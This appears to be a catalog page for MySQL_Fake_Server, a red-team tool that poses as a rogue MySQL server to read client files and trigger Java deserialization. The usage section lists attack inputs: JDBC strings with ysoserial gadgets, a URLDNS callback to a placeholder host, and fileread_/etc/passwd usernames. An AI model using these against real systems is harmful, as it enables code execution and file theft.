Primary Use Case

This tool is primarily used by penetration testers and red teamers to simulate a malicious MySQL server that can exploit file reading vulnerabilities in MySQL clients and trigger Java deserialization attacks via JDBC connections. It helps security professionals verify and demonstrate the impact of these vulnerabilities in controlled environments.

Key Features

Pure Python3 implementation with no external dependencies

Exploits MySQL client file reading vulnerabilities

Supports Java deserialization attacks on JDBC MySQL clients using ysoserial

Configurable file reading and deserialization payloads via config.json

Supports large binary file reading and saving with file content preview

Compatible with multiple MySQL clients including Navicat, PHPMyAdmin, and JDBC Connector

Allows switching authentication plugins to bypass client connection issues

Supports multiple deserialization gadget chains and payload customization

Insights & Recommendations

Requires Python 3 with no additional dependencies. Java and ysoserial are needed for deserialization payloads. Large file reading may consume significant memory as files are read fully before saving. Users should configure config.json carefully to match their target environment and payload requirements. Some MySQL clients may require authentication plugin adjustments (e.g., appending _clear) to successfully connect. Use responsibly in authorized penetration testing scenarios only.

Installation

Ensure Python 3 environment is installed
Clone or download the repository
Place ysoserial jar file (e.g., ysoserial-0.0.6-SNAPSHOT-all.jar) in the working directory
Modify config.json to configure file paths, ysoserial location, and payloads as needed
Run the fake server with the command: python server.py

Usage

python server.py

Start the MySQL Fake Server

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_Jdk7u21_calc

Example JDBC connection string to trigger Java deserialization payload using ServerStatusDiffInterceptor gadget

jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_URLDNS_http://yourdns.log.addr/

JDBC connection string example to trigger deserialization with detectCustomCollations option and URLDNS payload

Use username fileread_/etc/passwd to read /etc/passwd file from the client

Exploit MySQL client file reading vulnerability by specifying file path in username

Use username fileread_/etc/passwd_clear to switch to mysql_clear_password authentication plugin for Navicat compatibility

Bypass authentication plugin issues in Navicat by appending _clear to username

Modify config.json fileread section to predefine usernames and corresponding files to read

Configure file reading behavior for specific usernames

Modify config.json yso section to predefine ysoserial payload parameters for deserialization

Configure Java deserialization payloads for specific usernames

Ctrl+C

Stop the running MySQL Fake Server

Smart Usage Notes

Integrate with red team engagement workflows to simulate advanced MySQL client attacks.Use in purple team exercises to validate blue team detection capabilities against file reading and deserialization exploits.Automate payload customization via config.json for rapid testing of multiple client environments.Combine with network monitoring tools to detect anomalous MySQL client-server interactions.Leverage saved file outputs to analyze exfiltrated data and improve incident response playbooks.

OpenSec Atlas

MySQL_Fake_Server

About This Tool

Primary Use Case

Key Features

Insights & Recommendations

Installation

Usage

Smart Usage Notes

Security Capability Profile

Tags

You Might Also Like